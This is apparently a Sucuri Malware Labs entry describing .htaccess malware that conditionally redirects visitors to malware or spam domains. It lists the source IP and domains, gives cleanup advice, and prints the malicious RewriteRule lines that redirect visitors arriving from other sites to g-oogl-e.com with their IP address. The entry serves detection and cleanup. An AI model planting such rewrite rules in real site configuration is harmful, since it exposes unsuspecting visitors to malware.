Sucuri Malware Labs

Description:

This attack uses .htaccess to redirect users to a site serving malware (or spam).

Loads malware from (91.201.66.38):

12583497154.ru<br /> 6846183415.ru<br /> g-oogl-e.com<br /> uploadfriends2010.ru

Affecting:

Any type of web site (no specific target).

Clean up and details:

Remove offending code from .htaccess and/or index.php.

Links:

http://blog.sucuri.net/2010/04/conditional-redirects-or-the-htaccess-malware.html
http://sucuri.net/malware/malware-entry-mwhta7

Malware dump:

RewriteEngine On<br /> RewriteCond %{HTTP_REFERER} ^http://<br /> RewriteCond %{HTTP_REFERER} !%{HTTP_HOST}<br /> RewriteRule . http://g-oogl-e.com/%{REMOTE_ADDR}<br />

For all our web-based malware signatures, go here: http://labs.sucuri.net/?malwaredb